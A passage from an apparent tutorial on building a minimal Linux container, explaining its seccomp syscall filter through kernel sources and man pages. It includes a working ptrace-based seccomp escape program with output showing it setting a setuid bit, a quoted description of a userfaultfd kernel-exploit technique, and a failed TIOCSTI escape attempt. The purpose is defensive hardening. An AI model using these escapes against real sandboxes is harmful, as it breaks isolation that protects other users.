=> unmounting /oldroot.J9mulv...done.
=> trying a user namespace...writing /proc/1865/uid_map...writing /proc/1865/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
id
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ uid=1000(lizzie) gid=1000(lizzie) groups=1000(lizzie)
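
One thing worth knowing about the `ioctl` rule in that diff: an ioctl request is a number, not a set of flags, so a masked comparison and an exact comparison can disagree. This sketch models both. The function names are mine, and the literal values in the note below are the x86-64 ones, so treat them as an assumption on other architectures:

```c
#include <stdbool.h>
#include <stdint.h>
#include <sys/ioctl.h>

/* Model of SCMP_CMP_MASKED_EQ with mask == datum, as in the TIOCSTI rule. */
static bool matches_masked(uint64_t request, uint64_t datum)
{
	return (request & datum) == datum;
}

/* Model of SCMP_CMP_EQ: the request must be exactly the datum. */
static bool matches_exact(uint64_t request, uint64_t datum)
{
	return request == datum;
}
```

On x86-64 `TIOCSTI` is 0x5412 and `TIOCGWINSZ` is 0x5413, so `matches_masked(0x5413, 0x5412)` is true while `matches_exact(0x5413, 0x5412)` is false. The masked rule errs on the side of blocking more than just `TIOCSTI`.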

There’s a notion of “user keyrings”, that I believe are user-namespaced, but that’s it.

man 7 keyrings

	User keyrings
		Each UID known to the kernel has a record that contains
		two  keyrings: The  user keyring  and the  user session
		keyring.  These exist for as  long as the UID record in
		the  kernel exists.   A  link to  the  user keyring  is
		placed in a  new session keyring by  pam_keyinit when a
		new login session is initiated.

man 2 seccomp says:

The seccomp check will not be run again after the tracer is notified. (This means that seccomp-based sandboxes must not allow use of ptrace(2)–even of other sandboxed processes–without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)

Here’s an example (remember that our seccomp profile should prevent `chmod(x, S_ISUID)`):

ptrace_breaks_seccomp.c
/* -*- compile-command: "gcc -Wall -Werror -static ptrace_breaks_seccomp.c -o ptrace_breaks_seccomp" -*- */
#include <sys/stat.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <unistd.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <stddef.h>
#include <sys/syscall.h>

#define MAGIC_SYSCALL 666

int main (int argc, char **argv)
{
	pid_t child = 0;
	switch ((child = fork())) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		fprintf(stderr, "++ child stopping itself.\n");
		if (kill(getpid(), SIGSTOP)) {
			fprintf(stderr, "++ kill failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ child continued\n");
		/* pick an arbitrary syscall number. our tracer will change it to chmod. */
		if (syscall(MAGIC_SYSCALL, argv[0], S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "++ chmod-via-MAGIC_SYSCALL failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ chmod succeeded, child finished.\n");
		break;
	default:;
		int status = 0;
		if (ptrace(PTRACE_ATTACH,child, NULL, NULL)) {
			fprintf(stderr, "++ ptrace failed: %m\n");
			return 1;
		}
		waitpid(child, &status, 0);
		if (!(status & SIGSTOP)) {
			fprintf(stderr, "++ expected SIGSTOP in child.\n");
			return 1;
		}
		struct user_regs_struct regs = {0};
		while (1) {
			if (ptrace(PTRACE_GETREGS, child, 0, &regs)) {
				fprintf(stderr, "++ getting child registers failed: %m\n");
				return 1;
			}
			if (!(regs.orig_rax == MAGIC_SYSCALL)) {
				if (ptrace(PTRACE_SYSCALL, child, 0, 0)) {
					fprintf(stderr, "++ continuing the process failed.\n");
					return 1;
				}
				waitpid(child, &status, 0);
				if (!(status & SIGTRAP)) {
					fprintf(stderr, "++ expected SIGTRAP in child.\n");
					return 1;
				}
			} else {
				fprintf(stderr, "++ got MAGIC_SYSCALL!\n");
				regs.orig_rax = SYS_chmod;
				if (ptrace(PTRACE_SETREGS, child, 0, &regs)) {
					fprintf(stderr, "++ setting child registers failed: %m\n");
					return 1;
				}
				if (ptrace(PTRACE_CONT, child, 0, 0)) {
					fprintf(stderr, "++ continuing child failed: %m\n");
					return 1;
				}
				break;
			}
		}
		waitpid(child, NULL, 0);
		fprintf(stderr, "++ finished waiting.\n");

		break;
	}
	return 0;
}
allow_ptrace.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 2291ecb..42ecbc6 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -173,7 +173,6 @@ int syscalls()
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EiZRVH...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ ptrace failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_ptrace -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ThyjKm...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ child continued
++ got MAGIC_SYSCALL!
++ chmod succeeded, child finished.
++ finished waiting.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ptrace_breaks_seccomp 
-rws------ 1 lizzie lizzie 793K Oct 11 14:55 ptrace_breaks_seccomp

This seems to have been fixed in June by Kees Cook:

run seccomp after ptrace on LKML

There has been a long-standing (and documented) issue with seccomp
where ptrace can be used to change a syscall out from under seccomp.
This is a problem for containers and other wider seccomp filtered
environments where ptrace needs to remain available, as it allows
for an escape of the seccomp filter.

Since the ptrace attack surface is available for any allowed syscall,
moving seccomp after ptrace doesn't increase the actually available
attack surface. And this actually improves tracing since, for
example, tracers will be notified of syscall entry before seccomp
sends a SIGSYS, which makes debugging filters much easier.

The per-architecture changes do make one (hopefully small)
semantic change, which is that since ptrace comes first, it may
request a syscall be skipped. Running seccomp after this doesn't
make sense, so if ptrace wants to skip a syscall, it will bail
out early similarly to how seccomp was. This means that skipped
syscalls will not be fed through audit, though that likely means
we're actually avoiding noise this way.

This series first cleans up seccomp to remove the now unneeded
two-phase entry, fixes the SECCOMP_RET_TRACE hole (same as the
ptrace hole above), and then reorders seccomp after ptrace on
each architecture.

Thanks,

-Kees

This patchset made it into the kernel at 4.8. See for example 93e35e:

  [lizzie@empress linux-stable]$ git branch --contains 93e35efb8de45393cf61ed07f7b407629bf698ea
  * linux-4.8.y
    master
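
Since the fix only exists from 4.8 onward, a sandbox that leaves ptrace available may want to compare the running kernel's release against that version. This is a minimal sketch and not code from contained.c: the helper names `release_at_least` and `running_kernel_at_least` are made up for illustration, and only the leading major.minor numbers of the release string are compared. Distributions backport patches, so treat the result as a heuristic.

```c
#include <stdio.h>
#include <sys/utsname.h>

/* Hypothetical helper: returns 1 if a release string such as
 * "4.7.6-1-ARCH" names a kernel at or above major.minor, 0 if it is
 * older, and -1 if the string does not start with "<major>.<minor>". */
int release_at_least(const char *release, int major, int minor)
{
	int have_major = 0, have_minor = 0;

	if (sscanf(release, "%d.%d", &have_major, &have_minor) != 2)
		return -1;
	if (have_major != major)
		return have_major > major;
	return have_minor >= minor;
}

/* The same check against the running kernel, using uname(2). */
int running_kernel_at_least(int major, int minor)
{
	struct utsname host;

	if (uname(&host))
		return -1;
	return release_at_least(host.release, major, minor);
}
```

With the two hosts shown above, `release_at_least("4.7.6-1-ARCH", 4, 8)` reports an older kernel, so the ptrace restriction should stay in place there.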

This is, as far as I can tell, only documented in the kernel tree:

Documentation/vm/userfaultfd.txt@c8d2bc

= Userfaultfd =

== Objective ==

Userfaults allow the implementation of on-demand paging from userland
and more generally they allow userland to take control of various
memory page faults, something otherwise only the kernel code could do.

[...]

== API ==

When first opened the userfaultfd must be enabled invoking the
UFFDIO_API ioctl specifying a uffdio_api.api value set to UFFD_API (or
a later API version) which will specify the read/POLLIN protocol
userland intends to speak on the UFFD and the uffdio_api.features
userland requires. The UFFDIO_API ioctl if successful (i.e. if the
requested uffdio_api.api is spoken also by the running kernel and the
requested features are going to be enabled) will return into
uffdio_api.features and uffdio_api.ioctls two 64bit bitmasks of
respectively all the available features of the read(2) protocol and
the generic ioctl available.

Once the userfaultfd has been enabled the UFFDIO_REGISTER ioctl should
be invoked (if present in the returned uffdio_api.ioctls bitmask) to
register a memory range in the userfaultfd by setting the
uffdio_register structure accordingly. The uffdio_register.mode
bitmask will specify to the kernel which kind of faults to track for
the range (UFFDIO_REGISTER_MODE_MISSING would track missing
pages). The UFFDIO_REGISTER ioctl will return the
uffdio_register.ioctls bitmask of ioctls that are suitable to resolve
userfaults on the range registered. Not all ioctls will necessarily be
supported for all memory types depending on the underlying virtual
memory backend (anonymous memory vs tmpfs vs real filebacked
mappings).

Userland can use the uffdio_register.ioctls to manage the virtual
address space in the background (to add or potentially also remove
memory from the userfaultfd registered range). This means a userfault
could be triggering just before userland maps in the background the
user-faulted page.

The primary ioctl to resolve userfaults is UFFDIO_COPY. That
atomically copies a page into the userfault registered range and wakes
up the blocked userfaults (unless uffdio_copy.mode &
UFFDIO_COPY_MODE_DONTWAKE is set). Other ioctl works similarly to
UFFDIO_COPY. They're atomic as in guaranteeing that nothing can see an
half copied page since it'll keep userfaulting until the copy has
finished.
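
The handshake and registration steps described in that excerpt can be sketched roughly as follows. This is an illustration under assumptions, not code from the article: the function names are hypothetical, no optional features are requested, and the page-fault handling loop (reading events and answering with UFFDIO_COPY) is left out. On systems where userfaultfd is disabled or filtered, `uffd_open` simply returns -1.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Open a userfaultfd and perform the UFFDIO_API handshake.
 * Returns the descriptor, or -1 if the syscall or handshake fails. */
int uffd_open(void)
{
	struct uffdio_api api;
	int fd = (int) syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);

	if (fd < 0)
		return -1;
	memset(&api, 0, sizeof(api));
	api.api = UFFD_API;	/* protocol version we speak */
	api.features = 0;	/* no optional features requested */
	if (ioctl(fd, UFFDIO_API, &api)) {
		close(fd);
		return -1;
	}
	return fd;
}

/* Ask the kernel to report missing-page faults in [addr, addr + len).
 * Both must be page-aligned. Returns 0 on success, -1 on error. */
int uffd_track_missing(int fd, void *addr, size_t len)
{
	struct uffdio_register reg;

	memset(&reg, 0, sizeof(reg));
	reg.range.start = (unsigned long) addr;
	reg.range.len = len;
	reg.mode = UFFDIO_REGISTER_MODE_MISSING;
	return ioctl(fd, UFFDIO_REGISTER, &reg) ? -1 : 0;
}

/* Returns 1 if one anonymous page was registered, 0 if userfaultfd is
 * unavailable here, and -1 if the handshake worked but a later step failed. */
int uffd_demo(void)
{
	size_t page = (size_t) sysconf(_SC_PAGESIZE);
	int fd = uffd_open();
	void *mem;
	int rc;

	if (fd < 0)
		return 0;
	mem = mmap(NULL, page, PROT_READ | PROT_WRITE,
		   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (mem == MAP_FAILED) {
		close(fd);
		return -1;
	}
	rc = uffd_track_missing(fd, mem, page);
	munmap(mem, page);
	close(fd);
	return rc ? -1 : 1;
}
```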

Jann Horn described this to me, and linked to his vulnerability and exploit:

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.)

It was also used by Vitaly Nikolenko in his proof-of-concept for CVE-2016-6187:

[…]

If we could overwrite the cleanup function pointer (remember that this object is now allocated in user space), then we’ll have arbitrary code execution with CPL=0. The only problem is that subprocess_info object allocation and freeing happens on the same path. One way to modify the object’s function pointer is to somehow suspend the execution before (*info->cleanup)(info) gets called and set the function pointer to our privilege escalation payload. I could have found other objects of the same size with two “separate” paths for allocation and function triggering but I needed a reason to try userfaultfd() and the page splitting idea.

The userfaultfd syscall can be used to handle page faults in user space. We can allocate a page in user space and set up a handler (as a separate thread); when this page is accessed either for reading or writing, execution will be transferred to the user-space handler to deal with the page fault. There’s nothing new here and this was mentioned by Jann Horn

[…].

Allocate two consecutive pages, split the object over these two pages (as before) and set up the page handler for the second page.

When the user-space PF is triggered by memset, set up another user-space PF handler but for the first page.

The next user-space PF will be triggered when object variables (located in the first page) get initialised in call_usermodehelper_setup. At this point, set up another PF for the second page.

Finally, the last user-space PF handler can modify the cleanup function pointer (by setting it to our privilege escalation payload or a ROP chain) and set the path member to 0 (since these members are all located in the first page and already initialised).

Setting up user-space PF handlers for already “page-faulted” pages can be accomplished by munmapping/mapping these pages again and then passing them to userfaultfd(). The PoC for 4.5.1 can be found here. There’s nothing specific to the kernel version though (it should work on all vulnerable kernels). There’s no privilege escalation payload but the PoC will execute instructions at the user-space address 0xdeadbeef.

man 2 perf_event_open

    PERF_EVENT_OPEN(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

    NAME
            perf_event_open - set up performance monitoring

    SYNOPSIS
            #include <linux/perf_event.h>
            #include <linux/hw_breakpoint.h>

            int perf_event_open(struct perf_event_attr *attr,
                                            pid_t pid, int cpu, int group_fd,
                                            unsigned long flags);

            Note: There  is no glibc  wrapper for this system  call; see
            NOTES.

    DESCRIPTION
            [...]

    Arguments

         The pid and cpu arguments allow specifying which process and
         CPU to monitor:

         pid == 0 and cpu == -1
                 This measures the calling process/thread on any CPU.

         pid == 0 and cpu >= 0
                 This  measures  the  calling process/thread  only  when
                 running on the specified CPU.

         pid > 0 and cpu == -1
                 This measures the specified process/thread on any CPU.

         pid > 0 and cpu >= 0
                 This  measures the  specified process/thread  only when
                 running on the specified CPU.

         pid == -1 and cpu >= 0
                 This  measures all  processes/threads on  the specified
                 CPU.   This  requires  CAP_SYS_ADMIN  capability  or  a
                 /proc/sys/kernel/perf_event_paranoid value of less than
                 1.

         pid == -1 and cpu == -1
                 This setting is invalid and will return an error.
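
The pid/cpu combinations in that excerpt can be restated as a small classifier. This is only a sketch of the table above: the enum and function names are hypothetical, and values the excerpt does not mention (pid or cpu below -1) are treated as invalid here by assumption.

```c
#include <sys/types.h>

enum perf_target {
	PERF_TARGET_INVALID,		/* pid == -1 and cpu == -1 */
	PERF_TARGET_SELF_ANY_CPU,	/* pid == 0 and cpu == -1 */
	PERF_TARGET_SELF_ONE_CPU,	/* pid == 0 and cpu >= 0 */
	PERF_TARGET_TASK_ANY_CPU,	/* pid > 0 and cpu == -1 */
	PERF_TARGET_TASK_ONE_CPU,	/* pid > 0 and cpu >= 0 */
	PERF_TARGET_ALL_ON_CPU		/* pid == -1 and cpu >= 0 */
};

/* Map a (pid, cpu) pair onto the cases listed in the man page. */
enum perf_target classify_perf_target(pid_t pid, int cpu)
{
	if (pid < -1 || cpu < -1)
		return PERF_TARGET_INVALID;	/* assumption: not in the excerpt */
	if (pid == -1)
		return cpu == -1 ? PERF_TARGET_INVALID : PERF_TARGET_ALL_ON_CPU;
	if (pid == 0)
		return cpu == -1 ? PERF_TARGET_SELF_ANY_CPU
				 : PERF_TARGET_SELF_ONE_CPU;
	return cpu == -1 ? PERF_TARGET_TASK_ANY_CPU : PERF_TARGET_TASK_ONE_CPU;
}

/* The one case the excerpt flags as needing CAP_SYS_ADMIN or a
 * perf_event_paranoid value below 1. Other cases can still be refused
 * for reasons the excerpt does not cover. */
int perf_target_needs_privilege(enum perf_target target)
{
	return target == PERF_TARGET_ALL_ON_CPU;
}
```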

If a pid is specified, the corresponding process is found within the namespace:

kernel/events/core.c:9376@c8d2bc

    /**
     * sys_perf_event_open - open a performance event, associate it to a task/cpu
     *
     * @attr_uptr:  event_id type attributes for monitoring/sampling
     * @pid:                target pid
     * @cpu:                target cpu
     * @group_fd:           group leader event fd
     */
    SYSCALL_DEFINE5(perf_event_open,
                    struct perf_event_attr __user *, attr_uptr,
                    pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
    {
            /* ... */

            if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
                    task = find_lively_task_by_vpid(pid);
                    if (IS_ERR(task)) {
                            err = PTR_ERR(task);
                            goto err_group_fd;
                    }
            }

            /* ... */
    }

kernel/events/core.c:3621@c8d2bc

    static struct task_struct *
    find_lively_task_by_vpid(pid_t vpid)
    {
            struct task_struct *task;

            rcu_read_lock();
            if (!vpid)
                    task = current;
            else
                    task = find_task_by_vpid(vpid);
            if (task)
                    get_task_struct(task);
            rcu_read_unlock();

            if (!task)
                    return ERR_PTR(-ESRCH);

            return task;
    }

kernel/pid.c:459@c8d2bc

    struct task_struct *find_task_by_vpid(pid_t vnr)
    {
            return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
    }

The relevant commit is 0161028, whose commit message gives a good description of the problems:

commit 0161028b7c8aebef64194d3d73e43bc3b53b5c66
Author: Andy Lutomirski <redacted>
Date:   Mon May 9 15:48:51 2016 -0700

    perf/core: Change the default paranoia level to 2
    
    Allowing unprivileged kernel profiling lets any user dump follow kernel
    control flow and dump kernel registers.  This most likely allows trivial
    kASLR bypassing, and it may allow other mischief as well.  (Off the top
    of my head, the PERF_SAMPLE_REGS_INTR output during /dev/urandom reads
    could be quite interesting.)
    
    Signed-off-by: Andy Lutomirski <redacted>
    Acked-by: Kees Cook <redacted>
    Signed-off-by: Linus Torvalds <redacted>

diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt
index 57653a4..fcddfd5 100644
--- a/Documentation/sysctl/kernel.txt
+++ b/Documentation/sysctl/kernel.txt
@@ -645,7 +645,7 @@ allowed to execute.
 perf_event_paranoid:
 
 Controls use of the performance events system by unprivileged
-users (without CAP_SYS_ADMIN).  The default value is 1.
+users (without CAP_SYS_ADMIN).  The default value is 2.
 
  -1: Allow use of (almost) all events by all users
 >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 4e2ebf6..c0ded24 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -351,7 +351,7 @@ static struct srcu_struct pmus_srcu;
  *   1 - disallow cpu events for unpriv
  *   2 - disallow kernel profiling for unpriv
  */
-int sysctl_perf_event_paranoid __read_mostly = 1;
+int sysctl_perf_event_paranoid __read_mostly = 2;
 
 /* Minimum for 512 kiB + 1 user control page */

This is included in 4.6:

[lizzie@empress linux]$ git tag --contains 0161028b7c8aebef64194d3d73e43bc3b53b5c66
v4.6
v4.7
v4.7-rc1
v4.7-rc2
v4.7-rc3
v4.7-rc4
v4.7-rc5
v4.7-rc6
v4.7-rc7
v4.8
v4.8-rc1
v4.8-rc2
v4.8-rc3
v4.8-rc4
v4.8-rc5
v4.8-rc6
v4.8-rc7
v4.8-rc8

Thanks to Jann Horn for pointing this out.
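
To check which paranoia level a given host is actually running with, the value can be read back through /proc/sys. The sketch below is illustrative only: both function names are hypothetical, and the interpretation of the levels is taken from the comment in kernel/events/core.c shown in the diff above.

```c
#include <stdio.h>

/* Read an integer sysctl value from a /proc/sys-style file.
 * Returns 0 and stores the value in *level on success, -1 otherwise. */
int read_paranoid_level(const char *path, int *level)
{
	FILE *f = fopen(path, "r");
	int ok;

	if (!f)
		return -1;
	ok = fscanf(f, "%d", level) == 1;
	fclose(f);
	return ok ? 0 : -1;
}

/* At level 2 or higher, kernel profiling is disallowed for
 * unprivileged users; below that it is still permitted. */
int unprivileged_kernel_profiling_allowed(int level)
{
	return level < 2;
}
```

On a live system the path to pass would be /proc/sys/kernel/perf_event_paranoid.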

Documentation/prctl/no_new_privs.txt@c8d2bc

The execve system call can grant a newly-started program privileges that its parent did not have. The most obvious examples are setuid/setgid programs and file capabilities. […] Any task can set no_new_privs. Once the bit is set, it is inherited across fork, clone, and execve and cannot be unset. With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.
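
The "cannot be unset" part is easy to check from user space. Here is a minimal sketch, with a hypothetical function name, that does the experiment in a forked child so the caller's own no_new_privs state is left alone.

```c
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* In a forked child, set no_new_privs, try to clear it again, and
 * read it back. Returns 1 if the clear attempt was rejected and the
 * bit is still set, 0 if not, and -1 if the experiment could not run. */
int nnp_is_sticky(void)
{
	int status;
	pid_t child = fork();

	if (child < 0)
		return -1;
	if (child == 0) {
		int cleared;

		if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
			_exit(2);
		/* Asking for 0 is rejected: the bit can only ever be set. */
		cleared = prctl(PR_SET_NO_NEW_PRIVS, 0, 0, 0, 0) == 0;
		_exit(!cleared && prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0) == 1);
	}
	if (waitpid(child, &status, 0) < 0 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status) == 2 ? -1 : WEXITSTATUS(status);
}
```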

man 2 seccomp

		In order to  use the SECCOMP_SET_MODE_FILTER operation,
		either   the  caller   must   have  the   CAP_SYS_ADMIN
		capability in  its user  namespace, or the  thread must
		already have the no_new_privs bit set.  If that bit was
		not  already set  by an  ancestor of  this thread,  the
		thread must make the following call:

		    prctl(PR_SET_NO_NEW_PRIVS, 1);

		Otherwise,  the SECCOMP_SET_MODE_FILTER  operation will
		fail  and return  EACCES  in  errno.  This  requirement
		ensures  that an  unprivileged process  cannot apply  a
		malicious filter and then invoke a set-user-ID or other
		privileged  program using  execve(2), thus  potentially
		compromising  that program.   (Such a  malicious filter
		might, for  example, cause an attempt  to use setuid(2)
		to  set the  caller's user  IDs to  non-zero values  to
		instead  return 0  without actually  making the  system
		call.   Thus,   the  program  might  be   tricked  into
		retaining superuser  privileges in  circumstances where
		it is possible  to influence it to  do dangerous things
		because it did not actually drop privileges.)

It took me a while to internalize this behavior. My impression was that without `PR_SET_NO_NEW_PRIVS`, seccomp filters would be dropped across a `setuid` exec. This would lead to an easy way to escape `seccomp`:

Create a setuid executable that calls some filtered syscall.
Become a non-root user.
Execute that setuid executable.

But that’s actually not the case. Instead, you just can’t set seccomp filters unless you have one of the following:

PR_SET_NO_NEW_PRIVS == 1
CAP_SYS_ADMIN

and so libseccomp sets `PR_SET_NO_NEW_PRIVS` by default.

Here’s the code I thought would work:

setuidd_lower_reexec_and_escape.c
/* -*- compile-command: "gcc -Wall -Werror -static setuidd_lower_reexec_and_escape.c -o setuidd_lower_reexec_and_escape" -*- */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	if (argc == 1) {
		if (setresuid(99, 99, 99)) {
			fprintf(stderr, "++ setresuid failed: %m\n");
			return 1;
		}
		if (execve(argv[0], (char *[]) {argv[0], "-", 0}, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	} else {
		uid_t a, b, c = 0;
		getresuid(&a, &b, &c);
		fprintf(stderr, "++ we're %u/%u/%u.\n", a, b, c);
		if (ioctl(STDIN_FILENO, TIOCSTI, "!")) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
		}
	}
}

but it doesn’t:

[lizzie@empress l-c-i-500-l]$ sudo chown root setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$ sudo chmod 4007 setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./setuidd_lower_reexec_and_escape
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ZM2vnz...done.
=> trying a user namespace...writing /proc/2095/uid_map...writing /proc/2095/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ we're 99/99/99.
++ ioctl failed: Operation not permitted
=> cleaning cgroups...done.

Here’s the code responsible for that check:

kernel/seccomp.c:340@c8d2bc

/**
 * seccomp_prepare_filter: Prepares a seccomp filter for use.
 * @fprog: BPF program to install
 *
 * Returns filter on success or an ERR_PTR on failure.
 */
static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
	struct seccomp_filter *sfilter;
	int ret;
	const bool save_orig = IS_ENABLED(CONFIG_CHECKPOINT_RESTORE);

	if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
		return ERR_PTR(-EINVAL);

	BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));

	/*
	 * Installing a seccomp filter requires that the task has
	 * CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
	 * This avoids scenarios where unprivileged tasks can affect the
	 * behavior of privileged children.
	 */
	if (!task_no_new_privs(current) &&
	    security_capable_noaudit(current_cred(), current_user_ns(),
				     CAP_SYS_ADMIN) != 0)
		return ERR_PTR(-EACCES);

	/* Allocate a new seccomp_filter */
	sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
	if (!sfilter)
		return ERR_PTR(-ENOMEM);

	ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
					seccomp_check_filter, save_orig);
	if (ret < 0) {
		kfree(sfilter);
		return ERR_PTR(ret);
	}

	atomic_set(&sfilter->usage, 1);

	return sfilter;
}

and the code that unconditionally copies seccomp filters into every new task at fork time (exec keeps the same task, so the filters stay attached across it as well):

kernel/fork.c:1268@c8d2bc

static void copy_seccomp(struct task_struct *p)
{
#ifdef CONFIG_SECCOMP
	/*
	 * Must be called with sighand->lock held, which is common to
	 * all threads in the group. Holding cred_guard_mutex is not
	 * needed because this new task is not yet running and cannot
	 * be racing exec.
	 */
	assert_spin_locked(&current->sighand->siglock);

	/* Ref-count the new filter user, and assign it. */
	get_seccomp_filter(current);
	p->seccomp = current->seccomp;

	/*
	 * Explicitly enable no_new_privs here in case it got set
	 * between the task_struct being duplicated and holding the
	 * sighand lock. The seccomp state and nnp must be in sync.
	 */
	if (task_no_new_privs(current))
		task_set_no_new_privs(p);

	/*
	 * If the parent gained a seccomp mode after copying thread
	 * flags and between before we held the sighand lock, we have
	 * to manually enable the seccomp thread flag here.
	 */
	if (p->seccomp.mode != SECCOMP_MODE_DISABLED)
		set_tsk_thread_flag(p, TIF_SECCOMP);
#endif
}

(called by `copy_process` in kernel/fork.c@c8d2bc).
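
Both behaviors can be observed from user space without libseccomp. The following is a sketch under assumptions, not the filter contained.c installs: it uses the raw `prctl(PR_SET_SECCOMP, ...)` interface with a tiny hand-written BPF program, all function names are hypothetical, and the filter skips the `seccomp_data.arch` check a real filter should have. One helper shows that a filter installed after setting no_new_privs is still in force in a forked grandchild; the other reports what happens when the install is attempted without setting no_new_privs first.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Install a filter that fails getppid(2) with EPERM and allows all
 * other syscalls. Returns 0 on success, otherwise errno. */
static int deny_getppid(void)
{
	struct sock_filter insns[] = {
		BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
			 offsetof(struct seccomp_data, nr)),
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_getppid, 0, 1),
		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
	};
	struct sock_fprog prog = {
		.len = (unsigned short) (sizeof(insns) / sizeof(insns[0])),
		.filter = insns,
	};

	return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) ? errno : 0;
}

/* Run fn() in a forked child and return its exit status, or -1. */
static int run_in_child(int (*fn)(void))
{
	int status;
	pid_t child = fork();

	if (child < 0)
		return -1;
	if (child == 0)
		_exit(fn());
	if (waitpid(child, &status, 0) < 0 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status);
}

/* Child body: report whether getppid(2) is blocked in this task. */
static int getppid_is_blocked(void)
{
	errno = 0;
	return syscall(SYS_getppid) == -1 && errno == EPERM;
}

/* Child body: set no_new_privs, install the filter, fork again and
 * report whether the grandchild is still filtered (1), not filtered
 * (0), or whether setup failed (2). */
static int install_then_fork(void)
{
	if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) || deny_getppid())
		return 2;
	return run_in_child(getppid_is_blocked) == 1;
}

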